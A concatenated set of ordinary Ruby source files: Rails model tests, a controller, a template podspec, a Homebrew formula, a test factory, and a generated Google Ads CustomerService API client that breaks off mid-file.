describe "#validate_deploy_group_selected" do
it "is valid without deploy groups" do
stage.deploy_groups.clear
assert_valid stage
end
describe "with deploy group feature" do
before { DeployGroup.stubs(enabled?: true) }
it "is valid with deploy groups" do
assert_valid stage
end
describe "without deploy groups" do
before { stage.deploy_groups.clear }
it "is not valid" do
refute_valid stage
end
it "is valid when being the automated stage" do
stage.name = Stage::AUTOMATED_NAME
assert_valid stage
end
end
end
end
describe "#validate_not_auto_deploying_without_buddy" do
it "shows error when trying to auto-deploy without buddy" do
stage.deploy_on_release = true
stage.stubs(:deploy_requires_approval?).returns(true)
refute_valid stage
stage.errors[:deploy_on_release].must_equal ["cannot be used for a stage the requires approval"]
end
end
describe "#direct" do
before do
stage.confirm = false
stage.no_reference_selection = true
end
it "is direct" do
assert stage.direct?
end
it "is not direct when confirmation is required" do
stage.confirm = true
refute stage.direct?
end
it "is not direct when reference selection is required" do
stage.no_reference_selection = false
refute stage.direct?
end
# this could be loosened, but then we have to make sure it goes to pending and not
# into a running deploy
it "is not direct when approval is required" do
stage.stubs(deploy_requires_approval?: true)
refute stage.direct?
end
end
describe "#deployed_or_running_deploy" do
let(:deploy) { deploys(:succeeded_test) }
it "finds succeeded" do
stage.deployed_or_running_deploy.must_equal deploy
end
it "finds running" do
deploy.job.update_column(:status, 'running')
stage.deployed_or_running_deploy.must_equal deploy
end
it "ignores failed" do
deploy.job.update_column(:status, 'failed')
stage.deployed_or_running_deploy.must_be_nil
end
end
describe "#url" do
it "builds" do
stage.url.must_equal "http://www.test-url.com/projects/foo/stages/staging"
end
end
describe "#locked_by?" do
before { stage } # cache
it "returns true for self lock" do
assert_sql_queries 0 do
assert stage.locked_by?(Lock.new(resource: stage))
end
end
it "returns false for different stage's lock" do
lock = Lock.new(resource: stages(:test_production))
assert_sql_queries 0 do
refute stage.locked_by?(lock)
end
end
describe "with environments" do
before do
DeployGroup.stubs(enabled?: true)
stage # load stage
DeployGroupsStage.first # load column information
end
it "returns true if finds environment lock on stage" do
lock = Lock.new(resource: environments(:staging))
assert_sql_queries 3 do # deploy-groups -> deploy-groups-stages -> environments
assert stage.locked_by?(lock)
end
end
it "does not check environments on non-environment locks" do
assert_sql_queries 0 do
assert stage.locked_by?(Lock.new(resource: stage))
end
end
end
describe "with projects" do
it "finds project lock on stage" do
lock = Lock.new(resource: projects(:test))
assert_sql_queries 1 do
assert stage.locked_by?(lock)
end
end
end
describe "with deploy groups" do
it "is locked by own groups" do
lock = Lock.new(resource: deploy_groups(:pod100))
assert_sql_queries 2 do # deploy-groups -> deploy-groups-stages
assert stage.locked_by?(lock)
end
end
it "is not locked by other groups" do
lock = Lock.new(resource: deploy_groups(:pod1))
assert_sql_queries 2 do # deploy-groups -> deploy-groups-stages
refute stage.locked_by?(lock)
end
end
end
end
end
| 30.149292 | 120 | 0.670964 |
9101002bc2cc1bd24b07d7193f9c3d1dbb7aa6dd | 382 | require 'httparty'
class LoginHistoriesController < ApplicationController
before_action :auth_member!
layout "landing"
def index
    if current_user.present?
      @login_histories = LoginHistory.where(member_id: current_user.id)
                                     .order('created_at DESC')
                                     .paginate(page: params[:page], per_page: 10)
    end
end
end
| 23.875 | 103 | 0.65445 |
874b7df6e5fc0a15577f4bf39f9252fe09e43af3 | 5,098 | #
# Be sure to run `pod spec lint hehe.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "foverhehe"
s.version = "0.0.2"
s.summary = "A short description of hehe."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
123123123
DESC
s.homepage = "http://EXAMPLE/hehe"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
s.prepare_command = <<-CMD
touch "./Classes/`date`"
CMD
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "chenxi" => "[email protected]" }
# Or just: s.author = "chenxi"
# s.authors = { "chenxi" => "[email protected]" }
# s.social_media_url = "http://twitter.com/chenxi"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "http://github/hehe.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "Classes", "Classes/**/*.{h,m}"
s.exclude_files = "Classes/Exclude"
s.preserve_path = 'Classes/*'
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 35.901408 | 93 | 0.58827 |
abbde0abedf3a8e89f98a8c01c5510a1ae7d07ef | 1,005 | class Libosip < Formula
desc "Implementation of the eXosip2 stack"
homepage "https://www.gnu.org/software/osip/"
url "https://ftpmirror.gnu.org/osip/libosip2-4.1.0.tar.gz"
mirror "https://ftp.gnu.org/gnu/osip/libosip2-4.1.0.tar.gz"
sha256 "996aa0363316a871915b6f12562af53853a9962bb93f6abe1ae69f8de7008504"
bottle do
cellar :any
rebuild 2
sha256 "62a51e2ea7a623ab89b628d0a5655afe390dbeab86f5d86dd799c046e6767e77" => :sierra
sha256 "f55f17a9fcefb3780ec0ef62dcf65e46606e6a76f86e37bbbb1a70b9de12e1b1" => :el_capitan
sha256 "87803e02c0c3b65c8f028864200425f90b5a708bb6204a410f6c76a9e35545ee" => :yosemite
sha256 "531e7d5fb51ec0ccdc05b3e3346710770f756fa8b3eb7eb2cbbbe5b2cb1c8d59" => :mavericks
sha256 "c9424adf4a5eae16c98276e958650cadb419b54b0c3b420a7d81006d423ea2f7" => :mountain_lion
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 41.875 | 95 | 0.761194 |
ab56f118c4ac6a8337d6ca619017f9c98164b113 | 74 | FactoryBot.define do
factory :task, class: "Lakatan::Task" do
end
end
| 14.8 | 42 | 0.716216 |
e2711f29cb69766fa6a783c8690a625896e4533c | 34,058 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# require "google/ads/google_ads/error"
require "google/ads/google_ads/v8/services/customer_service_pb"
module Google
module Ads
module GoogleAds
module V8
module Services
module CustomerService
##
# Client for the CustomerService service.
#
# Service to manage customers.
#
class Client
include Paths
# @private
attr_reader :customer_service_stub
##
# Configure the CustomerService Client class.
#
# See {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all CustomerService clients
# ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
default_config = Client::Configuration.new
default_config.timeout = 3600.0
default_config.retry_policy = {
initial_delay: 5.0, max_delay: 60.0, multiplier: 1.3, retry_codes: [14, 4]
}
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the CustomerService Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new CustomerService client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the CustomerService client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/ads/google_ads/v8/services/customer_service_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
                                       !@config.endpoint.split(".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@customer_service_stub = ::Gapic::ServiceStub.new(
::Google::Ads::GoogleAds::V8::Services::CustomerService::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Returns the requested customer in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload get_customer(request, options = nil)
# Pass arguments to `get_customer` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
            #     Overrides the default settings for this call, e.g. timeout, retries, etc. Optional.
#
# @overload get_customer(resource_name: nil)
# Pass arguments to `get_customer` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource_name [::String]
# Required. The resource name of the customer to fetch.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Resources::Customer]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Resources::Customer]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def get_customer request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_customer.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"resource_name" => request.resource_name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_customer.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_customer.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :get_customer, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
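            # Example call (illustrative; the customer ID below is made up and
            # credentials are assumed to be configured):
            #
            #   client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new
            #   customer = client.get_customer resource_name: "customers/1234567890"
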
##
# Updates a customer. Operation statuses are returned.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [DatabaseError]()
# [FieldMaskError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
# [UrlFieldError]()
#
# @overload mutate_customer(request, options = nil)
# Pass arguments to `mutate_customer` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
            #     Overrides the default settings for this call, e.g. timeout, retries, etc. Optional.
#
# @overload mutate_customer(customer_id: nil, operation: nil, validate_only: nil, response_content_type: nil)
# Pass arguments to `mutate_customer` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the customer being modified.
# @param operation [::Google::Ads::GoogleAds::V8::Services::CustomerOperation, ::Hash]
# Required. The operation to perform on the customer
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
# @param response_content_type [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
# The response content type setting. Determines whether the mutable resource
# or just the resource name should be returned post mutation.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::MutateCustomerResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::MutateCustomerResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def mutate_customer request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.mutate_customer.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.mutate_customer.timeout,
metadata: metadata,
retry_policy: @config.rpcs.mutate_customer.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :mutate_customer, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Returns resource names of customers directly accessible by the
# user authenticating the call.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload list_accessible_customers(request, options = nil)
# Pass arguments to `list_accessible_customers` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g. timeout, retries, etc. Optional.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
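# A minimal usage sketch with a request object, assuming the client library is already
# loaded; this RPC takes no request fields, and the `resource_names` accessor on the
# response is an assumption based on the documented response type.
#
# @example List accessible customers (illustrative sketch)
#   client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new
#   request = ::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest.new
#   response = client.list_accessible_customers request
#   response.resource_names.each { |resource_name| puts resource_name }
#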
def list_accessible_customers request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_accessible_customers.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
options.apply_defaults timeout: @config.rpcs.list_accessible_customers.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_accessible_customers.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :list_accessible_customers, request,
options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Creates a new client under a manager. The new client customer is returned.
#
# List of thrown errors:
# [AccessInvitationError]()
# [AuthenticationError]()
# [AuthorizationError]()
# [CurrencyCodeError]()
# [HeaderError]()
# [InternalError]()
# [ManagerLinkError]()
# [QuotaError]()
# [RequestError]()
# [StringLengthError]()
# [TimeZoneError]()
#
# @overload create_customer_client(request, options = nil)
# Pass arguments to `create_customer_client` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g. timeout, retries, etc. Optional.
#
# @overload create_customer_client(customer_id: nil, customer_client: nil, email_address: nil, access_role: nil, validate_only: nil)
# Pass arguments to `create_customer_client` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the Manager under whom the client customer is being created.
# @param customer_client [::Google::Ads::GoogleAds::V8::Resources::Customer, ::Hash]
# Required. The new client customer to create. The resource name on this customer
# will be ignored.
# @param email_address [::String]
# Email address of the user who should be invited on the created client
# customer. Accessible only to customers on the allow-list.
# @param access_role [::Google::Ads::GoogleAds::V8::Enums::AccessRoleEnum::AccessRole]
# The proposed role of user on the created client customer.
# Accessible only to customers on the allow-list.
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
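# A minimal usage sketch of the keyword-argument overload documented above, assuming the
# client library is already loaded; the manager ID and the customer fields below are
# placeholder values.
#
# @example Create a client customer under a manager (illustrative sketch)
#   client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new
#   response = client.create_customer_client customer_id: "1234567890",
#                                             customer_client: {
#                                               descriptive_name: "Example client",
#                                               currency_code: "USD",
#                                               time_zone: "America/New_York"
#                                             }
#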
def create_customer_client request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_customer_client.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_customer_client.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_customer_client.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :create_customer_client, request,
options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Configuration class for the CustomerService API.
#
# This class represents the configuration for CustomerService,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # get_customer to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.get_customer.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.get_customer.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"googleads.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentials object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
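#
# A minimal configuration sketch, assuming a service account key file at a placeholder
# path; any of the credential types listed above could be substituted.
#
# @example Configure credentials and a global timeout (illustrative sketch)
#   ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
#     config.credentials = "/path/to/service_account_key.json"
#     config.timeout = 30.0
#   end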
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "googleads.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client,
nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the CustomerService API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy` (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
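# A minimal sketch of tuning a single RPC via the global configure block shown earlier;
# the timeout and retry values below are arbitrary placeholders.
#
# @example Override settings for get_customer only (illustrative sketch)
#   ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
#     config.rpcs.get_customer.timeout = 20.0
#     config.rpcs.get_customer.retry_policy = {
#       initial_delay: 0.2, max_delay: 10.0, multiplier: 1.3, retry_codes: ["UNAVAILABLE"]
#     }
#   end
#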
class Rpcs
##
# RPC-specific configuration for `get_customer`
# @return [::Gapic::Config::Method]
#
attr_reader :get_customer
##
# RPC-specific configuration for `mutate_customer`
# @return [::Gapic::Config::Method]
#
attr_reader :mutate_customer
##
# RPC-specific configuration for `list_accessible_customers`
# @return [::Gapic::Config::Method]
#
attr_reader :list_accessible_customers
##
# RPC-specific configuration for `create_customer_client`
# @return [::Gapic::Config::Method]
#
attr_reader :create_customer_client
# @private
def initialize parent_rpcs = nil
get_customer_config = parent_rpcs.get_customer if parent_rpcs.respond_to? :get_customer
